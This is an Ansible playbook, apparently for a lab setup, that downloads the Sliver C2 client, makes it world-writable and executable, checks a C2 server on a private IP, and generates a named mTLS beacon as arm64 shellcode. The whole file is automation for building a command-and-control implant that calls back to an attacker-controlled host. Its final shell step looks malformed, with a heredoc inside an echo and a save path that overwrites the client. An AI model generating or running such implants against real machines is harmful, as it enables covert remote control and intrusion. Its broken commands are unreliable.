---
- name: Install and generate a Sliver beacon
  hosts: localhost
  become: true
  vars:
    sliver_server_ip: "192.168.86.35" # Replace with your Kali machine's IP
    sliver_server_port: 8888 # Default Sliver C2 server port
    sliver_download_url: "https://github.com/BishopFox/sliver/releases/download/v1.5.39/sliver-client_macos-arm64"
    sliver_install_path: "/Users/dan/test/sliver-client"
    beacon_name: "NIKES_ON_MY_FEET_KEEP_MY_CIPHER_COMPLETE"

  tasks:
    - name: Create directory /Users/dan/test
      ansible.builtin.file:
        path: "/Users/dan/test"
        owner: dan
        group: staff
        state: directory
        mode: "0777"

    - name: Download Sliver client via curl
      ansible.builtin.shell: curl -L --fail --retry 3 -o {{ sliver_install_path }} {{ sliver_download_url }}
      register: download_result
      retries: 3
      delay: 5
      until: download_result.rc == 0
      changed_when: download_result.rc == 0

    - name: Verify Sliver client download
      ansible.builtin.stat:
        path: "{{ sliver_install_path }}"
      register: sliver_file

    - name: Ensure sliver client was downloaded successfully
      ansible.builtin.fail:
        msg: "Sliver client download failed"
      when: not sliver_file.stat.exists or sliver_file.stat.size < 10000 # Ensures file is not empty

    - name: Make sliver client executable
      ansible.builtin.file:
        path: "{{ sliver_install_path }}"
        mode: "0777"
        owner: dan
        group: staff

    - name: Check if Sliver C2 server is reachable
      ansible.builtin.wait_for:
        host: "{{ sliver_server_ip }}"
        port: "{{ sliver_server_port }}"
        timeout: 10
      register: c2_status

    - name: Fail if C2 server is unreachable
      ansible.builtin.fail:
        msg: "Sliver C2 server {{ sliver_server_ip }}:{{ sliver_server_port }} is unreachable!"
      when: c2_status.failed is defined and c2_status.failed

    - name: Generate a Sliver beacon
      ansible.builtin.shell: |
        echo -e "connect {{ sliver_server_ip }}:{{ sliver_server_port }} --skip-update <<EOF
        use beacon
        generate --mtls {{ sliver_server_ip }}:{{ sliver_server_port }} --arch arm64 --format shellcode --save {{ sliver_install_path }} --name {{ beacon_name }}\n\n
        exit" | {{ sliver_install_path }}
      register: sliver_beacon
      ignore_errors: yes

    - name: Print beacon generation output
      ansible.builtin.debug:
        msg: "{{ sliver_beacon.stdout }}"
